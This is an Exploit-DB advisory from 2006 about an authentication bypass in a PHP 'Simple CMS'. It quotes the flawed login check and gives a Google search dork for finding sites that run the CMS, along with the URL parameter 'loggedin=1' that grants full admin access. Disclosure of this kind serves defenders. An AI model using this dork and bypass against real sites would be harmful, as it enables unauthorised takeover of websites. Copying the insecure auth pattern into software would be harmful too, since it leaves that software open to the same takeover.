Simple CMS Administrator Authentication Bypass Vulnerability

ID EDB-ID:2133
Type exploitdb
Reporter daaan
Modified 2006-08-07T00:00:00


Simple CMS Administrator Authentication Bypass Vulnerability. Webapps exploit for php platform

                                            Simple CMS <>

The cms from uses no security at all, just a boolean 
"isloggedin". If you submit "loggedin=1" in the URL of any of the admin pages, 
you get full controll.

Vulnerable code:
if ($loggedin != "1"){
	header("Location: /login.php?e=1"); /* Redirect browser */ 
	/* Make sure that code below does not get executed when we redirect. */ 
//echo "ok";

Vulnerable files:

1. Google for "powered by php mysql simple cms"
2. type "admin/config_pages.php?loggedin=1" behind the url
3. Done. It works on every admin page that uses the so called auth.php.

I tried to contact the author, but i was unable to find ANY contact info.

# [2006-08-07]